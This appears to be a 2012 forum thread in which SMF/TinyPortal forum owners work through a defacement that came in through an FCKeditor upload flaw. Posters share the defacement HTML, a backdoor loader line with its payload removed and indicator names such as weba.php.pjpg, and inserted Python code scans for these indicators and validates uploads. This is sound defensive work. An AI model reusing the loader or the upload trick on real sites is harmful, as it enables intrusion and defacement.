Help with hack SouTHRaNDA wAs HeRE

Started by Scooby, January 02, 2012, 06:18:58 PM

TeaTephi

I was hacked also, but have followed the above advice and hopefully it will be ok now!  Keeping watch on this thread; if any more great advice pops up, I will be heeding it for sure.
SMF 2.0.2 | TinyPortal 1.107 Veterans day theme Opera 11.50
Mods:Profile Comments.....AEVA Media 2.10.....Activity in profile.....join-reason....Bookmarks 2.3.....SA Chat    Beta 4-1 Rev43....Tapatalk SMF 2.0 RC4/RC5/Final Plugin    3.0.1.....SMFPacks Likes Lite Mod

Thank you guys for all your support and development that you do.  I love my forum, and am so thankful to have a place to ask my questions.  I do love SMF 2.0 it's smoother and all my members love it!

slvreagl

In case anyone was wondering, this is the code on all three files that were hacked on my site: Index.php, Settings.php, SSI.php
<html>
    <head>
        <meta content="DiRTY SouTH" name="copyright">
        <meta content="southranda, dirty south, southranda was here" name="keywords">
        <meta content="SouTHRaNDA wAs HeRE" name="description">
        <title>by SouTHRaNDA</title>
        <link href="http://i.lulzimg.com/9b7d4026e6.gif" rel="shortcut icon">
    </head>
    <body bgcolor="#ffffff" text="#a9a9a9" onmousedown="return false;" onkeydown="return false;" oncontextmenu="return false;">
       <br>
       <div align="center">
           <br>
           <b>SouTHRaNDA wAs HeRE</b><br><br><i>con gli occhi rossi</i><br>
           <br>
           <img src="http://i.imgur.com/QmRje.jpg">
           <br>
           <br>
           <i>porta droga<br><br>bianca vergine pura<br><br>toglimi la paura</i><br><br><br>© <b>DiRTY SouTH</b><br>
           <br>
           <br>
           <embed src="http://www.youtube.com/v/oij0kscC2Yc&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
       </div>
    </body>
</html>


Also found and deleted the directory tp-images/File
with the following files:
weba.php.pjpg

index.php
<?php /*00000000000000000000000000000000*/ eval(gzinflate(base64_decode('[encoded payload removed]')));?>
<?php

exit;

?>

21032012.html
<html>

<head>

<meta http-equiv="content-type" content="text/html; charset=windows-1251">

</head>

<body>

21_03_2012 01

</body>

</html>

TeaTephi

Quote from: Lord Anubis on April 10, 2012, 04:37:44 PM
Thanks Brad, think I did remove the FCKeditor when I read about the vulnerability in the past. 

Also noticed this hacker added 404.php files in a few folders (so others might want to look for that as well)

- Root
- Themes
- Sources

I already cleared these files from my server, and I didn't save them (so I can't post them up)


I found one of these files in my root folder.  Not sure if you guys want me to upload it here?  or just delete it.  I haven't checked my SSI file, but I will today.


thefley

So I downloaded the tp-images/File to my desktop to take a look at the files. AVG popped up with 2
"Trojan horse PHP/BackDoor.BH"
"Trojan horse PHP/BackDoor.Cp"

files found......  so this looks like one way they are getting in.

www.greatplainsriders.com
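
The indicators reported in the posts above (the eval/gzinflate/base64_decode loader, the weba.php.pjpg double extension, stray 404.php files in the root, Themes and Sources folders, and the defacement marker) can be swept for in one pass. This is an added example, not code from any poster or from SMF/TinyPortal; the function names, reason strings and sample tree are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Loader pattern from the posted tp-images/File/index.php.
EVAL_CHAIN = re.compile(rb"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.I)
# Marker string from the defacement page posted in this thread.
DEFACE_MARKER = re.compile(rb"southranda", re.I)
# A .php segment that is not the final extension, e.g. weba.php.pjpg.
DOUBLE_EXT = re.compile(r"\.php\d?\.[^.]+$", re.I)
# Folders where stray 404.php files were reported ("." is the forum root).
DROP_DIRS = {".", "Themes", "Sources"}

def scan(root):
    """Return (relative_path, reason) findings for files under root."""
    root, findings = Path(root), []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root)
        double = bool(DOUBLE_EXT.search(path.name))
        if double:
            findings.append((rel.as_posix(), "php double extension"))
        if path.name.lower() == "404.php" and rel.parent.as_posix() in DROP_DIRS:
            findings.append((rel.as_posix(), "unexpected 404.php"))
        if double or path.suffix.lower() in {".php", ".html", ".htm"}:
            data = path.read_bytes()[:1_000_000]  # cap bytes inspected per file
            if EVAL_CHAIN.search(data):
                findings.append((rel.as_posix(), "eval/gzinflate/base64_decode chain"))
            if DEFACE_MARKER.search(data):
                findings.append((rel.as_posix(), "defacement marker"))
    return findings

def build_sample(root):
    """Write a constructed sample tree; file bodies are inert placeholders."""
    files = {
        "index.php": b"<html><title>by SouTHRaNDA</title></html>",
        "Sources/404.php": b"<?php // placeholder ?>",
        "tp-images/File/weba.php.pjpg": b"<?php // placeholder ?>",
        "tp-images/File/index.php": b"<?php eval(gzinflate(base64_decode('AAAA')));?>",
        "tp-images/photo.jpg": b"\xff\xd8\xff\xe0",
    }
    for name, body in files.items():
        target = Path(root) / name
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(*scan(tmp), sep="\n")
```

A hit is a lead to review by hand, not proof of compromise, and a clean result does not rule out changes made in the database.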

IchBin™

For those of you running TinyPortal make sure you are running the latest version. If you have any previous older install of TP on your forum, make sure you remove the FCKEditor folder.

Has anyone contacted their host to get help with their problem?
IchBin™        TinyPortal

TeaTephi

Quote from: IchBin™ on April 12, 2012, 05:27:15 PM
For those of you running TinyPortal make sure you are running the latest version. If you have any previous older install of TP on your forum, make sure you remove the FCKEditor folder.

Has anyone contacted their host to get help with their problem?

I contacted GoDaddy today, and purchased their security app, and submitted a ticket with all the problems that I had.

One thing that really annoyed me was that southranda took over my profile on my forum, and I had to come on as another admin and delete myself in order to delete him.  I was panicked, probably not the best choice, but I still have my forum intact.

I also submitted a report here with all the info they required (I think).  Hopefully we'll get to the bottom of this soon.

BTW, I did delete the FCKeditor and the file in tp-images, and updated TP.

EDIT:
Quote from: GoDaddy support
Dear Sir/Madam,

Thank you for contacting the Website Protection Customer Security Advisors.  We understand that your site recently was attacked and defaced by an attacker.  From a review of the site logs, it appears that a vulnerable version of FCKeditor was used in order to upload a malicious file to the hosting plan on 4/9/12.  Using this malicious file, the attacker was able to upload additional malicious files as well as modify your index page.  At this time it does appear that you have already removed the FCKeditor folder as well as the malicious files the attacker was able to upload.  A sample of logs has been provided and as can be seen from the logs, the attacker was able to read your configuration file in order to gain your database password.  The attacker appears to have made a connection to the database and it's possible that changes could have been made to the database or content copied from the database. You will want to ensure that your users all update their login information to the site as well as ensure that they update their passwords on other sites if they use the same password for multiple websites.  As a precaution you may wish to restore your database prior to 4/9/12 if you have a backup of the database that you can verify is clean.
IchBin™

If you did indeed have the FCKeditor folder, and were using TP prior to version 1RC1.2, then I'm pretty sure that was your problem. tp-images/ folder now has a .htaccess file to prevent files from being executed in it, and also TP should not allow anything but images to be uploaded to the directory.

FCKEditor had a file upload exploit that allowed exactly the same problem you have experienced.
IchBin™        TinyPortal
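
One way to enforce the image-only upload rule described in the post above, shown as an added example rather than TinyPortal's actual code. The allowlist, the check_upload function and its reason strings are assumptions; the sample inputs are constructed and include the weba.php.pjpg name reported earlier in the thread.

```python
import re

# Assumed allowlist for an image-only directory (not TinyPortal's actual list),
# mapped to the leading bytes each image type must start with.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Extensions a web server may map to an interpreter, wherever they sit in the name.
EXEC_EXT = re.compile(r"(php\d?|phtml|phar|cgi|pl|py|sh|asp|aspx|jsp)", re.I)
# Plain base name plus one or more dot-separated alphanumeric extensions.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]*(\.[A-Za-z0-9]+)+")

def check_upload(filename, data):
    """Return (accepted, reason) for a file offered to the image directory."""
    if not SAFE_NAME.fullmatch(filename):
        return False, "unsafe file name"
    extensions = filename.split(".")[1:]
    if any(EXEC_EXT.fullmatch(ext) for ext in extensions):
        return False, "executable extension in name"
    if len(extensions) != 1 or extensions[0].lower() not in MAGIC:
        return False, "not a single allowlisted image extension"
    if not data.startswith(MAGIC[extensions[0].lower()]):
        return False, "content does not match declared image type"
    if b"<?php" in data.lower():
        return False, "embedded PHP tag"
    return True, "ok"

# Constructed sample uploads; file bodies are inert placeholders.
SAMPLES = [
    ("photo.jpg", b"\xff\xd8\xff\xe0JFIF"),
    ("weba.php.pjpg", b"<?php // placeholder ?>"),
    ("photo.jpg", b"<?php // placeholder ?>"),
    ("pic.gif", b"GIF89a<?php // placeholder ?>"),
]

if __name__ == "__main__":
    for name, body in SAMPLES:
        print(name, check_upload(name, body))
```

The name and content checks complement the .htaccess mentioned in the post: the server-side rule still matters if a file reaches the directory by some other path.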

TeaTephi

Quote from: IchBin™ on April 12, 2012, 08:48:13 PM
If you did indeed have the FCKeditor folder, and were using TP prior to version 1RC1.2, then I'm pretty sure that was your problem. tp-images/ folder now has a .htaccess file to prevent files from being executed in it, and also TP should not allow anything but images to be uploaded to the directory.

FCKEditor had a file upload exploit that allowed exactly the same problem you have experienced.

Yep I had that folder, and the TP version was 1.104.   I've got it all correct now.  I wish I had deleted it earlier!

Oh it was weird that the hacker himself deleted the FCKeditor from my site.  I thought that was weird, like he closed the door behind him, so no one else could break in?
IchBin™

haha, maybe so. But yeah, that is definitely weird.
IchBin™        TinyPortal

MrPhil

Quote from: TeaTephi on April 12, 2012, 09:20:22 PM
Oh it was weird that the hacker himself deleted the FCKeditor from my site.  I thought that was weird, like he closed the door behind him, so no one else could break in?

It's not the first time that's been done. I seem to recall hearing of viruses that disable competing viruses.
